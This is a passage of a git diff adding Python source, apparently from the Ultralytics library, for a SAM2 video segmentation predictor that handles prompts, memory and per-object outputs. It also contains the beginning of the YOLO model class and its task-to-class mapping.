clear_non_cond_mem_for_multi_obj (bool): A flag to control clearing non-conditional memory for multi-object scenarios. + callbacks (Dict): A dictionary of callbacks for various prediction lifecycle events. + + Args: + cfg (Dict, Optional): Configuration settings for the predictor. Defaults to DEFAULT_CFG. + overrides (Dict, Optional): Additional configuration overrides. Defaults to None. + _callbacks (List, Optional): Custom callbacks to be added. Defaults to None. + + Note: + The `fill_hole_area` attribute is defined but not used in the current implementation. + """ + + # fill_hole_area = 8 # not used + + def __init__(self, cfg=DEFAULT_CFG, overrides=None, _callbacks=None): + """ + Initialize the predictor with configuration and optional overrides. + + This constructor initializes the SAM2VideoPredictor with a given configuration, applies any + specified overrides, and sets up the inference state along with certain flags + that control the behavior of the predictor. + + Args: + cfg (Dict): Configuration dictionary containing default settings. + overrides (Dict | None): Dictionary of values to override default configuration. + _callbacks (Dict | None): Dictionary of callback functions to customize behavior. + + Examples: + >>> predictor = SAM2VideoPredictor(cfg=DEFAULT_CFG) + >>> predictor = SAM2VideoPredictor(overrides={"imgsz": 640}) + >>> predictor = SAM2VideoPredictor(_callbacks={"on_predict_start": custom_callback}) + """ + super().__init__(cfg, overrides, _callbacks) + self.inference_state = {} + self.non_overlap_masks = True + self.clear_non_cond_mem_around_input = False + self.clear_non_cond_mem_for_multi_obj = False + self.callbacks["on_predict_start"].append(self.init_state) + + def get_model(self): + """ + Retrieves and configures the model with binarization enabled. + + Note: + This method overrides the base class implementation to set the binarize flag to True. + """ + model = super().get_model() + model.set_binarize(True) + return model + + def inference(self, im, bboxes=None, points=None, labels=None, masks=None): + """ + Perform image segmentation inference based on the given input cues, using the currently loaded image. This + method leverages SAM's (Segment Anything Model) architecture consisting of image encoder, prompt encoder, and + mask decoder for real-time and promptable segmentation tasks. + + Args: + im (torch.Tensor): The preprocessed input image in tensor format, with shape (N, C, H, W). + bboxes (np.ndarray | List, optional): Bounding boxes with shape (N, 4), in XYXY format. + points (np.ndarray | List, optional): Points indicating object locations with shape (N, 2), in pixels. + labels (np.ndarray | List, optional): Labels for point prompts, shape (N, ). 1 = foreground, 0 = background. + masks (np.ndarray, optional): Low-resolution masks from previous predictions shape (N,H,W). For SAM H=W=256. + + Returns: + (np.ndarray): The output masks in shape CxHxW, where C is the number of generated masks. + (np.ndarray): An array of length C containing quality scores predicted by the model for each mask. + """ + # Override prompts if any stored in self.prompts + bboxes = self.prompts.pop("bboxes", bboxes) + points = self.prompts.pop("points", points) + masks = self.prompts.pop("masks", masks) + + frame = self.dataset.frame + self.inference_state["im"] = im + output_dict = self.inference_state["output_dict"] + if len(output_dict["cond_frame_outputs"]) == 0: # initialize prompts + points, labels, masks = self._prepare_prompts(im.shape[2:], bboxes, points, labels, masks) + if points is not None: + for i in range(len(points)): + self.add_new_prompts(obj_id=i, points=points[[i]], labels=labels[[i]], frame_idx=frame) + elif masks is not None: + for i in range(len(masks)): + self.add_new_prompts(obj_id=i, masks=masks[[i]], frame_idx=frame) + self.propagate_in_video_preflight() + + consolidated_frame_inds = self.inference_state["consolidated_frame_inds"] + batch_size = len(self.inference_state["obj_idx_to_id"]) + if len(output_dict["cond_frame_outputs"]) == 0: + raise RuntimeError("No points are provided; please add points first") + + if frame in consolidated_frame_inds["cond_frame_outputs"]: + storage_key = "cond_frame_outputs" + current_out = output_dict[storage_key][frame] + if self.clear_non_cond_mem_around_input and (self.clear_non_cond_mem_for_multi_obj or batch_size <= 1): + # clear non-conditioning memory of the surrounding frames + self._clear_non_cond_mem_around_input(frame) + elif frame in consolidated_frame_inds["non_cond_frame_outputs"]: + storage_key = "non_cond_frame_outputs" + current_out = output_dict[storage_key][frame] + else: + storage_key = "non_cond_frame_outputs" + current_out = self._run_single_frame_inference( + output_dict=output_dict, + frame_idx=frame, + batch_size=batch_size, + is_init_cond_frame=False, + point_inputs=None, + mask_inputs=None, + reverse=False, + run_mem_encoder=True, + ) + output_dict[storage_key][frame] = current_out + # Create slices of per-object outputs for subsequent interaction with each + # individual object after tracking. + self._add_output_per_object(frame, current_out, storage_key) + self.inference_state["frames_already_tracked"].append(frame) + pred_masks = current_out["pred_masks"].flatten(0, 1) + pred_masks = pred_masks[(pred_masks > self.model.mask_threshold).sum((1, 2)) > 0] # filter blank masks + + return pred_masks, torch.ones(len(pred_masks), dtype=pred_masks.dtype, device=pred_masks.device) + + def postprocess(self, preds, img, orig_imgs): + """ + Post-processes the predictions to apply non-overlapping constraints if required. + + This method extends the post-processing functionality by applying non-overlapping constraints + to the predicted masks if the `non_overlap_masks` flag is set to True. This ensures that + the masks do not overlap, which can be useful for certain applications. + + Args: + preds (Tuple[torch.Tensor]): The predictions from the model. + img (torch.Tensor): The processed image tensor. + orig_imgs (List[np.ndarray]): The original images before processing. + + Returns: + results (list): The post-processed predictions. + + Note: + If `non_overlap_masks` is True, the method applies constraints to ensure non-overlapping masks. + """ + results = super().postprocess(preds, img, orig_imgs) + if self.non_overlap_masks: + for result in results: + if result.masks is None or len(result.masks) == 0: + continue + result.masks.data = self.model._apply_non_overlapping_constraints(result.masks.data.unsqueeze(0))[0] + return results + + @smart_inference_mode() + def add_new_prompts( + self, + obj_id, + points=None, + labels=None, + masks=None, + frame_idx=0, + ): + """ + Adds new points or masks to a specific frame for a given object ID. + + This method updates the inference state with new prompts (points or masks) for a specified + object and frame index. It ensures that the prompts are either points or masks, but not both, + and updates the internal state accordingly. It also handles the generation of new segmentations + based on the provided prompts and the existing state. + + Args: + obj_id (int): The ID of the object to which the prompts are associated. + points (torch.Tensor, Optional): The coordinates of the points of interest. Defaults to None. + labels (torch.Tensor, Optional): The labels corresponding to the points. Defaults to None. + masks (torch.Tensor, optional): Binary masks for the object. Defaults to None. + frame_idx (int, optional): The index of the frame to which the prompts are applied. Defaults to 0. + + Returns: + (tuple): A tuple containing the flattened predicted masks and a tensor of ones indicating the number of objects. + + Raises: + AssertionError: If both `masks` and `points` are provided, or neither is provided. + + Note: + - Only one type of prompt (either points or masks) can be added per call. + - If the frame is being tracked for the first time, it is treated as an initial conditioning frame. + - The method handles the consolidation of outputs and resizing of masks to the original video resolution. + """ + assert (masks is None) ^ (points is None), "'masks' and 'points' prompts are not compatible with each other." + obj_idx = self._obj_id_to_idx(obj_id) + + point_inputs = None + pop_key = "point_inputs_per_obj" + if points is not None: + point_inputs = {"point_coords": points, "point_labels": labels} + self.inference_state["point_inputs_per_obj"][obj_idx][frame_idx] = point_inputs + pop_key = "mask_inputs_per_obj" + self.inference_state["mask_inputs_per_obj"][obj_idx][frame_idx] = masks + self.inference_state[pop_key][obj_idx].pop(frame_idx, None) + # If this frame hasn't been tracked before, we treat it as an initial conditioning + # frame, meaning that the inputs points are to generate segments on this frame without + # using any memory from other frames, like in SAM. Otherwise (if it has been tracked), + # the input points will be used to correct the already tracked masks. + is_init_cond_frame = frame_idx not in self.inference_state["frames_already_tracked"] + obj_output_dict = self.inference_state["output_dict_per_obj"][obj_idx] + obj_temp_output_dict = self.inference_state["temp_output_dict_per_obj"][obj_idx] + # Add a frame to conditioning output if it's an initial conditioning frame or + # if the model sees all frames receiving clicks/mask as conditioning frames. + is_cond = is_init_cond_frame or self.model.add_all_frames_to_correct_as_cond + storage_key = "cond_frame_outputs" if is_cond else "non_cond_frame_outputs" + + # Get any previously predicted mask logits on this object and feed it along with + # the new clicks into the SAM mask decoder. + prev_sam_mask_logits = None + # lookup temporary output dict first, which contains the most recent output + # (if not found, then lookup conditioning and non-conditioning frame output) + if point_inputs is not None: + prev_out = ( + obj_temp_output_dict[storage_key].get(frame_idx) + or obj_output_dict["cond_frame_outputs"].get(frame_idx) + or obj_output_dict["non_cond_frame_outputs"].get(frame_idx) + ) + + if prev_out is not None and prev_out.get("pred_masks") is not None: + prev_sam_mask_logits = prev_out["pred_masks"].to(device=self.device, non_blocking=True) + # Clamp the scale of prev_sam_mask_logits to avoid rare numerical issues. + prev_sam_mask_logits.clamp_(-32.0, 32.0) + current_out = self._run_single_frame_inference( + output_dict=obj_output_dict, # run on the slice of a single object + frame_idx=frame_idx, + batch_size=1, # run on the slice of a single object + is_init_cond_frame=is_init_cond_frame, + point_inputs=point_inputs, + mask_inputs=masks, + reverse=False, + # Skip the memory encoder when adding clicks or mask. We execute the memory encoder + # at the beginning of `propagate_in_video` (after user finalize their clicks). This + # allows us to enforce non-overlapping constraints on all objects before encoding + # them into memory. + run_mem_encoder=False, + prev_sam_mask_logits=prev_sam_mask_logits, + ) + # Add the output to the output dict (to be used as future memory) + obj_temp_output_dict[storage_key][frame_idx] = current_out + + # Resize the output mask to the original video resolution + consolidated_out = self._consolidate_temp_output_across_obj( + frame_idx, + is_cond=is_cond, + run_mem_encoder=False, + ) + pred_masks = consolidated_out["pred_masks"].flatten(0, 1) + return pred_masks.flatten(0, 1), torch.ones(1, dtype=pred_masks.dtype, device=pred_masks.device) + + @smart_inference_mode() + def propagate_in_video_preflight(self): + """ + Prepare inference_state and consolidate temporary outputs before tracking. + + This method marks the start of tracking, disallowing the addition of new objects until the session is reset. + It consolidates temporary outputs from `temp_output_dict_per_obj` and merges them into `output_dict`. + Additionally, it clears non-conditioning memory around input frames and ensures that the state is consistent + with the provided inputs. + """ + # Tracking has started and we don't allow adding new objects until session is reset. + self.inference_state["tracking_has_started"] = True + batch_size = len(self.inference_state["obj_idx_to_id"]) + + # Consolidate per-object temporary outputs in "temp_output_dict_per_obj" and + # add them into "output_dict". + temp_output_dict_per_obj = self.inference_state["temp_output_dict_per_obj"] + output_dict = self.inference_state["output_dict"] + # "consolidated_frame_inds" contains indices of those frames where consolidated + # temporary outputs have been added (either in this call or any previous calls + # to `propagate_in_video_preflight`). + consolidated_frame_inds = self.inference_state["consolidated_frame_inds"] + for is_cond in {False, True}: + # Separately consolidate conditioning and non-conditioning temp outptus + storage_key = "cond_frame_outputs" if is_cond else "non_cond_frame_outputs" + # Find all the frames that contain temporary outputs for any objects + # (these should be the frames that have just received clicks for mask inputs + # via `add_new_points` or `add_new_mask`) + temp_frame_inds = set() + for obj_temp_output_dict in temp_output_dict_per_obj.values(): + temp_frame_inds.update(obj_temp_output_dict[storage_key].keys()) + consolidated_frame_inds[storage_key].update(temp_frame_inds) + # consolidate the temporary output across all objects on this frame + for frame_idx in temp_frame_inds: + consolidated_out = self._consolidate_temp_output_across_obj( + frame_idx, is_cond=is_cond, run_mem_encoder=True + ) + # merge them into "output_dict" and also create per-object slices + output_dict[storage_key][frame_idx] = consolidated_out + self._add_output_per_object(frame_idx, consolidated_out, storage_key) + if self.clear_non_cond_mem_around_input and (self.clear_non_cond_mem_for_multi_obj or batch_size <= 1): + # clear non-conditioning memory of the surrounding frames + self._clear_non_cond_mem_around_input(frame_idx) + + # clear temporary outputs in `temp_output_dict_per_obj` + for obj_temp_output_dict in temp_output_dict_per_obj.values(): + obj_temp_output_dict[storage_key].clear() + + # edge case: if an output is added to "cond_frame_outputs", we remove any prior + # output on the same frame in "non_cond_frame_outputs" + for frame_idx in output_dict["cond_frame_outputs"]: + output_dict["non_cond_frame_outputs"].pop(frame_idx, None) + for obj_output_dict in self.inference_state["output_dict_per_obj"].values(): + for frame_idx in obj_output_dict["cond_frame_outputs"]: + obj_output_dict["non_cond_frame_outputs"].pop(frame_idx, None) + for frame_idx in consolidated_frame_inds["cond_frame_outputs"]: + assert frame_idx in output_dict["cond_frame_outputs"] + consolidated_frame_inds["non_cond_frame_outputs"].discard(frame_idx) + + # Make sure that the frame indices in "consolidated_frame_inds" are exactly those frames + # with either points or mask inputs (which should be true under a correct workflow). + all_consolidated_frame_inds = ( + consolidated_frame_inds["cond_frame_outputs"] | consolidated_frame_inds["non_cond_frame_outputs"] + ) + input_frames_inds = set() + for point_inputs_per_frame in self.inference_state["point_inputs_per_obj"].values(): + input_frames_inds.update(point_inputs_per_frame.keys()) + for mask_inputs_per_frame in self.inference_state["mask_inputs_per_obj"].values(): + input_frames_inds.update(mask_inputs_per_frame.keys()) + assert all_consolidated_frame_inds == input_frames_inds + + @staticmethod + def init_state(predictor): + """ + Initialize an inference state for the predictor. + + This function sets up the initial state required for performing inference on video data. + It includes initializing various dictionaries and ordered dictionaries that will store + inputs, outputs, and other metadata relevant to the tracking process. + + Args: + predictor (SAM2VideoPredictor): The predictor object for which to initialize the state. + """ + if len(predictor.inference_state) > 0: # means initialized + return + assert predictor.dataset is not None + assert predictor.dataset.mode == "video" + + inference_state = {} + inference_state["num_frames"] = predictor.dataset.frames + # inputs on each frame + inference_state["point_inputs_per_obj"] = {} + inference_state["mask_inputs_per_obj"] = {} + # values that don't change across frames (so we only need to hold one copy of them) + inference_state["constants"] = {} + # mapping between client-side object id and model-side object index + inference_state["obj_id_to_idx"] = OrderedDict() + inference_state["obj_idx_to_id"] = OrderedDict() + inference_state["obj_ids"] = [] + # A storage to hold the model's tracking results and states on each frame + inference_state["output_dict"] = { + "cond_frame_outputs": {}, # dict containing {frame_idx: } + "non_cond_frame_outputs": {}, # dict containing {frame_idx: } + } + # Slice (view) of each object tracking results, sharing the same memory with "output_dict" + inference_state["output_dict_per_obj"] = {} + # A temporary storage to hold new outputs when user interact with a frame + # to add clicks or mask (it's merged into "output_dict" before propagation starts) + inference_state["temp_output_dict_per_obj"] = {} + # Frames that already holds consolidated outputs from click or mask inputs + # (we directly use their consolidated outputs during tracking) + inference_state["consolidated_frame_inds"] = { + "cond_frame_outputs": set(), # set containing frame indices + "non_cond_frame_outputs": set(), # set containing frame indices + } + # metadata for each tracking frame (e.g. which direction it's tracked) + inference_state["tracking_has_started"] = False + inference_state["frames_already_tracked"] = [] + predictor.inference_state = inference_state + + def get_im_features(self, im, batch=1): + """ + Extracts and processes image features using SAM2's image encoder for subsequent segmentation tasks. + + Args: + im (torch.Tensor): The input image tensor. + batch (int, optional): The batch size for expanding features if there are multiple prompts. Defaults to 1. + + Returns: + vis_feats (torch.Tensor): The visual features extracted from the image. + vis_pos_embed (torch.Tensor): The positional embeddings for the visual features. + feat_sizes (List(Tuple[int])): A list containing the sizes of the extracted features. + + Note: + - If `batch` is greater than 1, the features are expanded to fit the batch size. + - The method leverages the model's `_prepare_backbone_features` method to prepare the backbone features. + """ + backbone_out = self.model.forward_image(im) + if batch > 1: # expand features if there's more than one prompt + for i, feat in enumerate(backbone_out["backbone_fpn"]): + backbone_out["backbone_fpn"][i] = feat.expand(batch, -1, -1, -1) + for i, pos in enumerate(backbone_out["vision_pos_enc"]): + pos = pos.expand(batch, -1, -1, -1) + backbone_out["vision_pos_enc"][i] = pos + _, vis_feats, vis_pos_embed, feat_sizes = self.model._prepare_backbone_features(backbone_out) + return vis_feats, vis_pos_embed, feat_sizes + + def _obj_id_to_idx(self, obj_id): + """ + Map client-side object id to model-side object index. + + Args: + obj_id (int): The unique identifier of the object provided by the client side. + + Returns: + obj_idx (int): The index of the object on the model side. + + Raises: + RuntimeError: If an attempt is made to add a new object after tracking has started. + + Note: + - The method updates or retrieves mappings between object IDs and indices stored in + `inference_state`. + - It ensures that new objects can only be added before tracking commences. + - It maintains two-way mappings between IDs and indices (`obj_id_to_idx` and `obj_idx_to_id`). + - Additional data structures are initialized for the new object to store inputs and outputs. + """ + obj_idx = self.inference_state["obj_id_to_idx"].get(obj_id, None) + if obj_idx is not None: + return obj_idx + + # This is a new object id not sent to the server before. We only allow adding + # new objects *before* the tracking starts. + allow_new_object = not self.inference_state["tracking_has_started"] + if allow_new_object: + # get the next object slot + obj_idx = len(self.inference_state["obj_id_to_idx"]) + self.inference_state["obj_id_to_idx"][obj_id] = obj_idx + self.inference_state["obj_idx_to_id"][obj_idx] = obj_id + self.inference_state["obj_ids"] = list(self.inference_state["obj_id_to_idx"]) + # set up input and output structures for this object + self.inference_state["point_inputs_per_obj"][obj_idx] = {} + self.inference_state["mask_inputs_per_obj"][obj_idx] = {} + self.inference_state["output_dict_per_obj"][obj_idx] = { + "cond_frame_outputs": {}, # dict containing {frame_idx: } + "non_cond_frame_outputs": {}, # dict containing {frame_idx: } + } + self.inference_state["temp_output_dict_per_obj"][obj_idx] = { + "cond_frame_outputs": {}, # dict containing {frame_idx: } + "non_cond_frame_outputs": {}, # dict containing {frame_idx: } + } + return obj_idx + else: + raise RuntimeError( + f"Cannot add new object id {obj_id} after tracking starts. " + f"All existing object ids: {self.inference_state['obj_ids']}. " + f"Please call 'reset_state' to restart from scratch." + ) + + def _run_single_frame_inference( + self, + output_dict, + frame_idx, + batch_size, + is_init_cond_frame, + point_inputs, + mask_inputs, + reverse, + run_mem_encoder, + prev_sam_mask_logits=None, + ): + """ + Run tracking on a single frame based on current inputs and previous memory. + + Args: + output_dict (Dict): The dictionary containing the output states of the tracking process. + frame_idx (int): The index of the current frame. + batch_size (int): The batch size for processing the frame. + is_init_cond_frame (bool): Indicates if the current frame is an initial conditioning frame. + point_inputs (Dict, Optional): Input points and their labels. Defaults to None. + mask_inputs (torch.Tensor, Optional): Input binary masks. Defaults to None. + reverse (bool): Indicates if the tracking should be performed in reverse order. + run_mem_encoder (bool): Indicates if the memory encoder should be executed. + prev_sam_mask_logits (torch.Tensor, Optional): Previous mask logits for the current object. Defaults to None. + + Returns: + current_out (dict): A dictionary containing the output of the tracking step, including updated features and predictions. + + Raises: + AssertionError: If both `point_inputs` and `mask_inputs` are provided, or neither is provided. + + Note: + - The method assumes that `point_inputs` and `mask_inputs` are mutually exclusive. + - The method retrieves image features using the `get_im_features` method. + - The `maskmem_pos_enc` is assumed to be constant across frames, hence only one copy is stored. + - The `fill_holes_in_mask_scores` function is commented out and currently unsupported due to CUDA extension requirements. + """ + # Retrieve correct image features + current_vision_feats, current_vision_pos_embeds, feat_sizes = self.get_im_features( + self.inference_state["im"], batch_size + ) + + # point and mask should not appear as input simultaneously on the same frame + assert point_inputs is None or mask_inputs is None + current_out = self.model.track_step( + frame_idx=frame_idx, + is_init_cond_frame=is_init_cond_frame, + current_vision_feats=current_vision_feats, + current_vision_pos_embeds=current_vision_pos_embeds, + feat_sizes=feat_sizes, + point_inputs=point_inputs, + mask_inputs=mask_inputs, + output_dict=output_dict, + num_frames=self.inference_state["num_frames"], + track_in_reverse=reverse, + run_mem_encoder=run_mem_encoder, + prev_sam_mask_logits=prev_sam_mask_logits, + ) + + maskmem_features = current_out["maskmem_features"] + if maskmem_features is not None: + current_out["maskmem_features"] = maskmem_features.to( + dtype=torch.float16, device=self.device, non_blocking=True + ) + # NOTE: Do not support the `fill_holes_in_mask_scores` function since it needs cuda extensions + # potentially fill holes in the predicted masks + # if self.fill_hole_area > 0: + # pred_masks = current_out["pred_masks"].to(self.device, non_blocking=True) + # pred_masks = fill_holes_in_mask_scores(pred_masks, self.fill_hole_area) + + # "maskmem_pos_enc" is the same across frames, so we only need to store one copy of it + current_out["maskmem_pos_enc"] = self._get_maskmem_pos_enc(current_out["maskmem_pos_enc"]) + return current_out + + def _get_maskmem_pos_enc(self, out_maskmem_pos_enc): + """ + Caches and manages the positional encoding for mask memory across frames and objects. + + This method optimizes storage by caching the positional encoding (`maskmem_pos_enc`) for + mask memory, which is constant across frames and objects, thus reducing the amount of + redundant information stored during an inference session. It checks if the positional + encoding has already been cached; if not, it caches a slice of the provided encoding. + If the batch size is greater than one, it expands the cached positional encoding to match + the current batch size. + + Args: + out_maskmem_pos_enc (List[torch.Tensor] or None): The positional encoding for mask memory. + Should be a list of tensors or None. + + Returns: + out_maskmem_pos_enc (List[torch.Tensor]): The positional encoding for mask memory, either cached or expanded. + + Note: + - The method assumes that `out_maskmem_pos_enc` is a list of tensors or None. + - Only a single object's slice is cached since the encoding is the same across objects. + - The method checks if the positional encoding has already been cached in the session's constants. + - If the batch size is greater than one, the cached encoding is expanded to fit the batch size. + """ + model_constants = self.inference_state["constants"] + # "out_maskmem_pos_enc" should be either a list of tensors or None + if out_maskmem_pos_enc is not None: + if "maskmem_pos_enc" not in model_constants: + assert isinstance(out_maskmem_pos_enc, list) + # only take the slice for one object, since it's same across objects + maskmem_pos_enc = [x[0:1].clone() for x in out_maskmem_pos_enc] + model_constants["maskmem_pos_enc"] = maskmem_pos_enc + else: + maskmem_pos_enc = model_constants["maskmem_pos_enc"] + # expand the cached maskmem_pos_enc to the actual batch size + batch_size = out_maskmem_pos_enc[0].size(0) + if batch_size > 1: + out_maskmem_pos_enc = [x.expand(batch_size, -1, -1, -1) for x in maskmem_pos_enc] + return out_maskmem_pos_enc + + def _consolidate_temp_output_across_obj( + self, + frame_idx, + is_cond=False, + run_mem_encoder=False, + ): + """ + Consolidates per-object temporary outputs into a single output for all objects. + + This method combines the temporary outputs for each object on a given frame into a unified + output. It fills in any missing objects either from the main output dictionary or leaves + placeholders if they do not exist in the main output. Optionally, it can re-run the memory + encoder after applying non-overlapping constraints to the object scores. + + Args: + frame_idx (int): The index of the frame for which to consolidate outputs. + is_cond (bool, Optional): Indicates if the frame is considered a conditioning frame. + Defaults to False. + run_mem_encoder (bool, Optional): Specifies whether to run the memory encoder after + consolidating the outputs. Defaults to False. + + Returns: + consolidated_out (dict): A consolidated output dictionary containing the combined results for all objects. + + Note: + - The method initializes the consolidated output with placeholder values for missing objects. + - It searches for outputs in both the temporary and main output dictionaries. + - If `run_mem_encoder` is True, it applies non-overlapping constraints and re-runs the memory encoder. + - The `maskmem_features` and `maskmem_pos_enc` are only populated when `run_mem_encoder` is True. + """ + batch_size = len(self.inference_state["obj_idx_to_id"]) + storage_key = "cond_frame_outputs" if is_cond else "non_cond_frame_outputs" + + # Initialize `consolidated_out`. Its "maskmem_features" and "maskmem_pos_enc" + # will be added when rerunning the memory encoder after applying non-overlapping + # constraints to object scores. Its "pred_masks" are prefilled with a large + # negative value (NO_OBJ_SCORE) to represent missing objects. + consolidated_out = { + "maskmem_features": None, + "maskmem_pos_enc": None, + "pred_masks": torch.full( + size=(batch_size, 1, self.imgsz[0] // 4, self.imgsz[1] // 4), + fill_value=-1024.0, + dtype=torch.float32, + device=self.device, + ), + "obj_ptr": torch.full( + size=(batch_size, self.model.hidden_dim), + fill_value=-1024.0, + dtype=torch.float32, + device=self.device, + ), + "object_score_logits": torch.full( + size=(batch_size, 1), + # default to 10.0 for object_score_logits, i.e. assuming the object is + # present as sigmoid(10)=1, same as in `predict_masks` of `MaskDecoder` + fill_value=10.0, + dtype=torch.float32, + device=self.device, + ), + } + for obj_idx in range(batch_size): + obj_temp_output_dict = self.inference_state["temp_output_dict_per_obj"][obj_idx] + obj_output_dict = self.inference_state["output_dict_per_obj"][obj_idx] + out = ( + obj_temp_output_dict[storage_key].get(frame_idx) + # If the object doesn't appear in "temp_output_dict_per_obj" on this frame, + # we fall back and look up its previous output in "output_dict_per_obj". + # We look up both "cond_frame_outputs" and "non_cond_frame_outputs" in + # "output_dict_per_obj" to find a previous output for this object. + or obj_output_dict["cond_frame_outputs"].get(frame_idx) + or obj_output_dict["non_cond_frame_outputs"].get(frame_idx) + ) + # If the object doesn't appear in "output_dict_per_obj" either, we skip it + # and leave its mask scores to the default scores (i.e. the NO_OBJ_SCORE + # placeholder above) and set its object pointer to be a dummy pointer. + if out is None: + # Fill in dummy object pointers for those objects without any inputs or + # tracking outcomes on this frame (only do it under `run_mem_encoder=True`, + # i.e. when we need to build the memory for tracking). + if run_mem_encoder: + # fill object pointer with a dummy pointer (based on an empty mask) + consolidated_out["obj_ptr"][obj_idx : obj_idx + 1] = self._get_empty_mask_ptr(frame_idx) + continue + # Add the temporary object output mask to consolidated output mask + consolidated_out["pred_masks"][obj_idx : obj_idx + 1] = out["pred_masks"] + consolidated_out["obj_ptr"][obj_idx : obj_idx + 1] = out["obj_ptr"] + + # Optionally, apply non-overlapping constraints on the consolidated scores and rerun the memory encoder + if run_mem_encoder: + high_res_masks = F.interpolate( + consolidated_out["pred_masks"], + size=self.imgsz, + mode="bilinear", + align_corners=False, + ) + if self.model.non_overlap_masks_for_mem_enc: + high_res_masks = self.model._apply_non_overlapping_constraints(high_res_masks) + consolidated_out["maskmem_features"], consolidated_out["maskmem_pos_enc"] = self._run_memory_encoder( + batch_size=batch_size, + high_res_masks=high_res_masks, + is_mask_from_pts=True, # these frames are what the user interacted with + object_score_logits=consolidated_out["object_score_logits"], + ) + + return consolidated_out + + def _get_empty_mask_ptr(self, frame_idx): + """ + Get a dummy object pointer based on an empty mask on the current frame. + + Args: + frame_idx (int): The index of the current frame for which to generate the dummy object pointer. + + Returns: + (torch.Tensor): A tensor representing the dummy object pointer generated from the empty mask. + """ + # Retrieve correct image features + current_vision_feats, current_vision_pos_embeds, feat_sizes = self.get_im_features(self.inference_state["im"]) + + # Feed the empty mask and image feature above to get a dummy object pointer + current_out = self.model.track_step( + frame_idx=frame_idx, + is_init_cond_frame=True, + current_vision_feats=current_vision_feats, + current_vision_pos_embeds=current_vision_pos_embeds, + feat_sizes=feat_sizes, + point_inputs=None, + # A dummy (empty) mask with a single object + mask_inputs=torch.zeros((1, 1, *self.imgsz), dtype=torch.float32, device=self.device), + output_dict={}, + num_frames=self.inference_state["num_frames"], + track_in_reverse=False, + run_mem_encoder=False, + prev_sam_mask_logits=None, + ) + return current_out["obj_ptr"] + + def _run_memory_encoder(self, batch_size, high_res_masks, object_score_logits, is_mask_from_pts): + """ + Run the memory encoder on masks. + + This is usually after applying non-overlapping constraints to object scores. Since their scores changed, their + memory also needs to be computed again with the memory encoder. + + Args: + batch_size (int): The batch size for processing the frame. + high_res_masks (torch.Tensor): High-resolution masks for which to compute the memory. + object_score_logits (torch.Tensor): Logits representing the object scores. + is_mask_from_pts (bool): Indicates if the mask is derived from point interactions. + + Returns: + (tuple[torch.Tensor, torch.Tensor]): A tuple containing the encoded mask features and positional encoding. + """ + # Retrieve correct image features + current_vision_feats, _, feat_sizes = self.get_im_features(self.inference_state["im"], batch_size) + maskmem_features, maskmem_pos_enc = self.model._encode_new_memory( + current_vision_feats=current_vision_feats, + feat_sizes=feat_sizes, + pred_masks_high_res=high_res_masks, + is_mask_from_pts=is_mask_from_pts, + object_score_logits=object_score_logits, + ) + + # "maskmem_pos_enc" is the same across frames, so we only need to store one copy of it + maskmem_pos_enc = self._get_maskmem_pos_enc(maskmem_pos_enc) + return maskmem_features.to(dtype=torch.float16, device=self.device, non_blocking=True), maskmem_pos_enc + + def _add_output_per_object(self, frame_idx, current_out, storage_key): + """ + Split a multi-object output into per-object output slices and add them into Output_Dict_Per_Obj. + + The resulting slices share the same tensor storage. + + Args: + frame_idx (int): The index of the current frame. + current_out (Dict): The current output dictionary containing multi-object outputs. + storage_key (str): The key used to store the output in the per-object output dictionary. + """ + maskmem_features = current_out["maskmem_features"] + assert maskmem_features is None or isinstance(maskmem_features, torch.Tensor) + + maskmem_pos_enc = current_out["maskmem_pos_enc"] + assert maskmem_pos_enc is None or isinstance(maskmem_pos_enc, list) + + for obj_idx, obj_output_dict in self.inference_state["output_dict_per_obj"].items(): + obj_slice = slice(obj_idx, obj_idx + 1) + obj_out = { + "maskmem_features": None, + "maskmem_pos_enc": None, + "pred_masks": current_out["pred_masks"][obj_slice], + "obj_ptr": current_out["obj_ptr"][obj_slice], + } + if maskmem_features is not None: + obj_out["maskmem_features"] = maskmem_features[obj_slice] + if maskmem_pos_enc is not None: + obj_out["maskmem_pos_enc"] = [x[obj_slice] for x in maskmem_pos_enc] + obj_output_dict[storage_key][frame_idx] = obj_out + + def _clear_non_cond_mem_around_input(self, frame_idx): + """ + Remove the non-conditioning memory around the input frame. + + When users provide correction clicks, the surrounding frames' non-conditioning memories can still contain outdated + object appearance information and could confuse the model. This method clears those non-conditioning memories + surrounding the interacted frame to avoid giving the model both old and new information about the object. + + Args: + frame_idx (int): The index of the current frame where user interaction occurred. + """ + r = self.model.memory_temporal_stride_for_eval + frame_idx_begin = frame_idx - r * self.model.num_maskmem + frame_idx_end = frame_idx + r * self.model.num_maskmem + for t in range(frame_idx_begin, frame_idx_end + 1): + self.inference_state["output_dict"]["non_cond_frame_outputs"].pop(t, None) + for obj_output_dict in self.inference_state["output_dict_per_obj"].values(): + obj_output_dict["non_cond_frame_outputs"].pop(t, None) diff --git a/2024.ultralytics/v8.3.46/models/yolo/model.py b/2024.ultralytics/v8.3.46/models/yolo/model.py new file mode 100644 index 0000000..6381960 --- /dev/null +++ b/2024.ultralytics/v8.3.46/models/yolo/model.py @@ -0,0 +1,111 @@ +# Ultralytics YOLO 🚀, AGPL-3.0 license + +from pathlib import Path + +from ultralytics.engine.model import Model +from ultralytics.models import yolo +from ultralytics.nn.tasks import ClassificationModel, DetectionModel, OBBModel, PoseModel, SegmentationModel, WorldModel +from ultralytics.utils import ROOT, yaml_load + + +class YOLO(Model): + """YOLO (You Only Look Once) object detection model.""" + + def __init__(self, model="yolo11n.pt", task=None, verbose=False): + """Initialize YOLO model, switching to YOLOWorld if model filename contains '-world'.""" + path = Path(model) + if "-world" in path.stem and path.suffix in {".pt", ".yaml", ".yml"}: # if YOLOWorld PyTorch model + new_instance = YOLOWorld(path, verbose=verbose) + self.__class__ = type(new_instance) + self.__dict__ = new_instance.__dict__ + else: + # Continue with default YOLO initialization + super().__init__(model=model, task=task, verbose=verbose) + + @property + def task_map(self): + """Map head to model, trainer, validator, and predictor classes.""" + return { + "classify": { + "model": ClassificationModel, + "trainer": yolo.classify.ClassificationTrainer, + "validator": yolo.classify.ClassificationValidator, + "predictor": yolo.classify.ClassificationPredictor, + }, + "detect": { + "model": DetectionModel, + "trainer": yolo.detect.DetectionTrainer, + "validator": yolo.detect.DetectionValidator, + "predictor": yolo.detect.DetectionPredictor, + }, + "segment": { + "model": SegmentationModel, + "trainer": yolo.segment.SegmentationTrainer, + "validator": yolo.segment.SegmentationValidator, + "predictor": yolo.segment.SegmentationPredictor, + }, + "pose": { + "model": PoseModel, + "trainer": yolo.pose.PoseTrainer, + "validator": yolo.pose.PoseValidator, + "predictor": yolo.pose.PosePredictor, + }, + 